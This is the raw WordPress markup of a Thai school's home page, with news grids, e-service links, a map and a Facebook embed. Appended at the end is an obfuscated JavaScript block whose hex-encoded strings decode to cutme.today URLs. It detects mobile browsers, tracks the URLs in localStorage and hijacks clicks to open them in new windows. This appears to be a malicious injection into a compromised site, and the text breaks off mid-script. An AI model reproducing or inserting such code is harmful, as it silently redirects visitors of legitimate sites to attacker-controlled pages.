{\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 